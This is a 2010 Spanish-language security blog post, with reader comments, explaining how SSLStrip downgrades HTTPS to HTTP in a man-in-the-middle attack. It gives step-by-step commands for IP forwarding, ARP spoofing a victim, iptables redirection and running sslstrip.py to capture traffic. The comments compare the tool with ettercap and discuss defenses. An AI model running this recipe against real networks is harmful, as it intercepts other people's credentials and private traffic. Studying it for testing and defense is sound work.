SSLStrip – Espiando tráfico SSL

30 mayo 2010 12 Comentarios


Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede tu trafico sin problemas.

El funcionamiento de es simple, reemplaza todas las peticiones “https://” de una página web por “http://” y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.

A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.

En resumen, los pasos serian:

1. Configurar IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Realizando ataque ARP MITM entre las 2 maquinas:

arpspoof -i eth0 -t VICTIMA HOST

3. Redireccionar trafico con iptables:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4. Iniciar SSLStrip en el puerto utilizado

python sslstrip.py -w archivo

Espero que les sea de utilidad y no olviden comentar

Mas Información:
Pagina Oficial del SSLStrip

Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

También puede interesarte...

Zemanta
Twitter Digg Delicious Stumbleupon Technorati Facebook Email
Criptografia, Herramientas Seguridad
, , , ,

About DragoN

Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales. Information Security Researcher con más de 10 años de experiencias en Ethical Hacking, Pen Testing y Análisis Forense. Docente Universitario en Pre y Post-Grado, Speaker y Organizador de diferentes eventos de Seguridad Informática, Co-Fundador del ACK Security Conference y Creador de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.
View all posts by DragoN

12 Respuestas para “SSLStrip – Espiando tráfico SSL”

  1. darkhunter Responder 7 junio 2010 en 8:14 AM

    Debemos recordar que ahora no es nisiquiera necesario hacer esto porque la herramienta ettercap ya tiene todo lo necesario para realizar el ataque de manera automatizada con lo que cualquier persona puede hacerlo y comprometer la seguridad de nuestra informacion. desde que conozco la tecnica no entro a ningun correo sin primero verificar que el certificado sea valido y por regla general busco tarjetas en modo promiscuo con el mismo ettercap y por ultimo siempre se debe verificar que sea realmente una conexion https ….. y no solo por la barra del navegador

  2. j8k6f4v9j Responder 7 junio 2010 en 8:20 AM

    Hace tiempo que no uso darkhunter, pero recuerdo que con ese programa preparaba un certificado falso. En este caso, con SSLStrip (que no he usado), el método es diferente, ya que el usuario no tiene que aceptar ningún certificado al tratarse de una comunicación no protegida con SSL la que se produce entre víctima y atacante.

    Salu2

  3. j8k6f4v9j Responder 7 junio 2010 en 8:21 AM

    s/darkhunter/ettercap, darkhunter/

  4. Carlos Responder 10 junio 2010 en 5:30 PM

    Ettercap automatiza el MiM pero genera una error de certificado en la víctima. SSLStrip aumenta las posibilidades de que se produzca un error de usuario ya que pasa de tener que aceptar un certificado inseguro a no fijarse en que la conexión es http.

  5. DeMoN Responder 14 junio 2010 en 9:59 AM

    Con el ataque de ettercap el usuario tiene que aceptar una advertencia de certificado falso pero la conexion es realmente en https, con este metodo el usuario no tiene que aceptar nada, la conexion es en http pero es mas facil no fijarse en una s pequeña que aceptar un monton de advertencias…

  6. solodebian Responder 18 febrero 2011 en 12:14 PM

    Cierto, con sslstrip no tienes que aceptar una advertencia de certificado… pero creo que sslstrip ya se esta quedando obsoleto porque he estado haciendo pruebas con mis maquinas y no es tan efectivo como antes aparte que al entrar en una pagina como puede ser la pagina de login de gmail directamente sslstrip me tira unos errores me imagino que las paginas como hotmail gmail y similares ya se han puesto las pilas para bloquear esta herramienta que ha funcionado desde febrero del 2009 hasta febrero del 2011.

Trackbacks/Pingbacks

  1. [SSLStrip] Espiando tráfico SSL - 10 junio 2010

    [...] Fuente: http://www.dragonjar.org/ [...]
  2. FaceNiff o Firesheep para Android - 31 enero 2013

    [...] Utilizar conexiones SSL en cualquier sitio donde tengamos que loguearnos (recuerden que Facebook y Twitter ya se pueden configurar para usar SSL por defecto), aunque no es un método infalible. [...]
  3. SSLScan, comprueba la seguridad de tu SSL | Hermetric - 19 mayo 2013

    [...] SSLStrip – Espiando tráfico SSLSin SSL ¿Y Ahora Quien Podrá Defendernos?Fallo en OpenSSL permite obtener clave privadaTwitter ahora permite conexiones seguras SIEMPREForzando Conexiones SSL por defecto v2Facebook ahora permite conexiones seguras SIEMPREAnálisis del Fallo en el Generador de Números Aleatorios de OpenSSL/DebianRepositorio con Herramientas de Seguridad [...]

Dejar un Comentario